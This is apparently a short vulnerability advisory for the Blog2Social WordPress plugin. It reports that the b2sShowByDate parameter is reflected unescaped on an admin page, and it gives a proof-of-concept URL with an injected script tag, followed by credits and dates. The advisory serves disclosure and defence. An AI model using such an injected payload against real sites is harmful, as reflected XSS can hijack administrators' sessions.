The plugin does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue
https://example.com/wp-admin/admin.php?page=blog2social&b2sShowByDate="><script>alert(/XSS/)</script>
JrXnm
JrXnm
Yes
2021-11-22 (about 7 months ago)
2021-11-22 (about 7 months ago)
2022-04-11 (about 2 months ago)